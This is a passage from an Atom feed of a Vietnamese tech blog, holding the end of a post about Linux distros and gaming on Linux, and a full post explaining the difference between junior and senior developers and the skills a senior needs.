    &lt;p&gt;Tự do tùy biến, và học tập nghiên cứu, lập trình phát triển phần mềm …v.v, đối với các cty doanh nghiệp thì linux server là lựa chọn hợp lý trong việc tiết kiệm chi phí chi trả hoặc lo ngoại về vấn đề bảo mật không an toàn.&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tuy nhiên linux ko dành mục đích để chơi game vì thế sẽ là trở ngại lớn cho các game thủ khi đặt chân vào con đường này, tuy nhiên không có nghĩa là linux không thể chơi game, và bạn vẫn có thể giải trí nhẹ với các tựaa game văn phòng, hoặc &lt;a href=&quot;https://store.steampowered.com/&quot;&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;Steam&lt;/code&gt;&lt;/a&gt; phần mềm này đã hổ trợ trên linux 1 thời gian dài và hầu như có những tựa game không thua kém gì trên windows, và có những tựa game buộc bạn chi 1 số tiền ko ít để sỡ hữu những tưa game support trên linux. Còn 1 tin vui cho các ae game thủ là các ông lớn về mãng đồ họa cũng đã có động thái support lên cho các dùng distro linux.&lt;/p&gt;

&lt;p&gt;Vì thế sẽ không còn xa nếu linux tiếp tục được phát triển và vươn lên thành hệ điều hành thứ 2 của người dùng và thoát khỏi cái bóng thống trị của windows (Microssoft) !&lt;/p&gt;</content><author><name>Panadora</name></author><category term="[&quot;unixlinux&quot;, &quot;other&quot;, &quot;news&quot;]" /><summary type="html">Distro Linux là gì?. Nên dùng Distro Linux nào, chúng có gì khác nhau ?</summary></entry><entry><title type="html">Junior là gì? Senior là gì?</title><link href="http://localhost:4000/junior-la-gi-senior-la-gi.html" rel="alternate" type="text/html" title="Junior là gì? Senior là gì?" /><published>2020-04-22T00:00:00+07:00</published><updated>2020-04-22T00:00:00+07:00</updated><id>http://localhost:4000/junior-la-gi-senior-la-gi</id><content type="html" xml:base="http://localhost:4000/junior-la-gi-senior-la-gi.html">&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/2020422JvsS.jpg&quot; width=&quot;600&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Junior, Senior là các thuật ngữ dùng để  phân chia trình độ giữa những người làm trong một công ty, trong một ngành hay trong một lĩnh vực nào đó&lt;/strong&gt;&lt;/p&gt;

&lt;h3 style=&quot;font-weight: bold;&quot;&gt;Junior là gì? Senior là gì?&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Junior là gì?&lt;/strong&gt;&lt;/p&gt;

&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/2020422Junior.jpg&quot; width=&quot;600&quot; height=&quot;auto&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Junior là từ tiếng anh chỉ những người nhỏ tuổi hơn, ít thâm niêm hơn, ở cấp dưới. Thường các bạn sinh viên mới ra trường, chưa có kinh nghiệm sẽ làm ở vị trí junior. Junior đa phần có chút ít kinh nghiệm trong chuyên môn cũng như khả năng làm việc. Họ có thể thực hiện, giải quyết và xoay sở những vấn đề nhỏ, không mấy phức tạp và khó khăn. Còn những công việc đòi hỏi trình độ chuyên môn cao thì họ cần sự giúp đỡ của những người có kinh nghiệm hơn.  Công việc chiếm phần lớn thời gian của Junior là học, học hỏi kinh nghiệm từ senior.&lt;/p&gt;

&lt;p&gt;Một ví dụ về junior developer là những người chưa biết gì về công nghê, hoặc chỉ biết sơ sơ nhưng chưa được sử dụng thực tế bao giờ. Họ chỉ cần viết code theo yêu cầu, hoàn thành đúng chức năng và cho chạy được. Khi gặp khó khăn, họ tốn nhiều thời gian để tìm ra vấn đề, và giải quyết nó. Việc chủ yếu của các junior developer là học về công nghệ, học về cấu trúc dự án, và học cách viết code hoàn thiện từ senior.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Senior là gì ?&lt;/strong&gt;&lt;/p&gt;

&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/2020422Senior.jpg&quot; width=&quot;600&quot; height=&quot;auto&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Được gọi là Senior khi bạn đã đủ sự hiểu biết, có kinh nghiệm dày dặn và trình độ chuyên môn cao trong lĩnh vực bạn làm việc. Mỗi khi gặp khó khăn trong công việc bạn sẽ luôn tìm được cách khắc phục và giải quyết, bạn cũng có khả năng làm việc độc lập để đem lại hiệu quả cao nhất. Những người đi làm từ 4-5 năm thì tạm gọi là senior. Tuy nhiên, nếu làm việc lâu năm nhưng chỉ làm những task nhỏ nhỏ, việc lặt vặt, không trau dồi thêm kiến thức thì cũng không khác junior là bao. Vì vậy số năm đi làm chưa đủ để đánh giá, phân loại một senior. Mỗi công ty có nhiều cấp bậc cho senior, tùy thuộc vào năng lực và trình độ mà các senior sẽ được phân theo cao thấp khác nhau.&lt;/p&gt;

&lt;p&gt;Lý do mà các Senior được coi trọng ở công ty bởi vì họ là những người có thâm niên lâu năm nên họ có thể giải quyết các vấn đề khó khăn một các dễ dàng hơn, và tìm cách khắc phục những sai lầm tương tự..Họ có chuyên môn cao, có khả năng chỉ dẫn cho người mới trong công việc nên họ là người dạy các Junior&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Các kỹ năng cần có của một Senior&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Mỗi lĩnh vực thì cần có những kỹ năng đặc thù riêng biệt, tuy nhiên để làm một Senior chuyên nghiệm bạn cần vài kỹ năng cơ bản sau:&lt;/p&gt;

&lt;p&gt;– Kỹ năng lãnh đạo: là một senior bạn tất nhiên phải có kỹ năng tổ chức lãnh đạo. Bạn phải lập kế hoạch dạy các junior như thế nào, giao công việc cho những người mới và quản lý tốt những người cấp dưới. Ngoài chuyên môn giỏi thì kỹ năng lãnh đạo sẽ góp phần giúp con đường sự nghiệp của bạn được thăng tiến&lt;/p&gt;

&lt;p&gt;– Kỹ năng làm việc nhóm: dù bạn là ai thì kỹ năng này rất quan trọng. Bạn là senior, bạn giỏi và xuất sắc thôi chưa đủ, bạn cần biết hỗ trợ, giúp đỡ, góp ý để cả team của bạn ngày càng phát triển và tiến bộ hơn. Nhiều cái đầu cùng nhau làm việc thì vẫn tốt hơn một cái đầu.&lt;/p&gt;

&lt;p&gt;– Kỹ năng giao tiếp: khi bạn làm mentor cho những người mới vào làm, bạn phải giao tiếp tốt với họ, giúp đỡ họ hòa nhập với cộng đồng công ty. Giao tiếp tốt sẽ giúp bạn dễ trình bày quan điểm, truyền tải được ý tưởng, tránh những hiểu lầm không đáng có.&lt;/p&gt;

&lt;p&gt;Như vậy, Senior và Junior có sự khác biệt về kinh nghiệm cũng như trong trình độ và chuyên môn. Có một điểm giống giữa Senior và Junior đó là phải luôn luôn học hỏi tìm tòi cái mới, trau dồi kiến thức mỗi ngày. Trong môi trường khắc nghiệt như hiện nay, dù bạn có là Senior, nếu không chịu cập nhật kiên thức, giữ khư khư cái cũ, bạn sẽ nhanh chóng lỗi thời và bị đào thải. Do vậy, Senior nên giữ mindset của một junor luôn học hỏi cố gắng hoàn thiện bản thân, tiếp thu những điều mới lạ ở môi trường làm việc xung quanh.&lt;/p&gt;</content><author><name>Pandora</name></author><category term="[&quot;other&quot;, &quot;news&quot;]" /><summary type="html">Junior, Senior là các thuật ngữ dùng để phân chia trình độ giữa những người làm trong một công ty, trong một ngành hay trong một lĩnh vực nào đó.</summary></entry></feed>